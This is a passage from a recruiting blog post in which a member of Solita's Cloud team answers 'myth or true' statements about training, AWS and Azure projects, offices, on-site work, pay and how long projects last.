True. We offer in-house learning paths if you’re looking to get a new certification, for example, or are otherwise interested in studying technology. You’ll get peer support and positive pressure to study at the same pace as others.

As mentioned earlier, public cloud plays a major role in our work, and it will only get stronger in the future. The most important thing is that you’re interested in and motivated to learn new things and work with the public cloud.

(Ed. Note: From time to time, we offer free open-to-all training programmes around various technologies and skills.)

#7 The majority of Solita’s public cloud projects are AWS projects.

True. I don’t have the exact figures, but AWS plays the biggest part in our public cloud projects right now. There’s demand for Azure projects in the market, but we don’t have enough people to take them on.

(Ed. Note: The share of Azure is growing fast in our customer base. We’re currently strengthening our Azure expertise, both by recruiting new talents, and by providing our employees with the opportunity to learn and work on Azure projects.)

#8 Apparently Solita has an office and Cloud experts in Turku?

Yes! In Turku, we have six Cloud team members: four in the Cloud Services team (including subcontractors) plus Antti and Toni who deliver consulting around cloud services. I haven’t been to the office but I hear it’s fun.

(Ed. Note: Solita has five offices in Finland: Tampere, Helsinki, Oulu, Turku and Lahti. At the moment, Cloud is represented in all other cities except Oulu and Lahti.)

#9 Solita sells the expertise of individuals. Does this mean I’d be sitting at the customer site alone?

Mostly a myth. It depends on the project – some require on-site presence from time to time, but a lot of work can be done flexibly in the office or remotely. No one will be forced to sit at the customer site alone. Projects include both individual and team work. This, too, largely depends on the project and the employee’s own preferences.

#10 Solita doesn’t have a billing-based bonus.

True. If we have one, no one has told me.

(Ed. Note: Solita’s compensation model for experts is based on a monthly salary.)

#11 Solita only works with customers in the public sector.

False. Solita has both public and private sector customers, from many different industries.

(Ed. Note: In 2019, around 55% of our Cloud customers were from the private sector.)

#12 Projects require long-term commitment, so you’ll be working on the same project for a long time.

True, if that’s what you want! When I started at Solita, my team lead asked me in advance what kind of projects I’d like to be part of, and what would be an absolute no-no. I’m happy to note that my wishes have actually been heard. But it might be because I’m not picky. Projects can last from a few days to years, and people might be working on several projects at the same time. Of course, you can also rotate between projects, so a final commitment isn’t necessary.

Helinä was interviewed by Minna Luiro who’s responsible for the Cloud unit’s recruiting and employer image at Solita. Do you have more questions or thoughts around the above topics? You can reach out to Minna: +358 40 843 6245 or minna.luiro@solita.fi.

If you’re excited about the idea of joining Solita’s Cloud team, send us an open application. You can also browse our vacancies.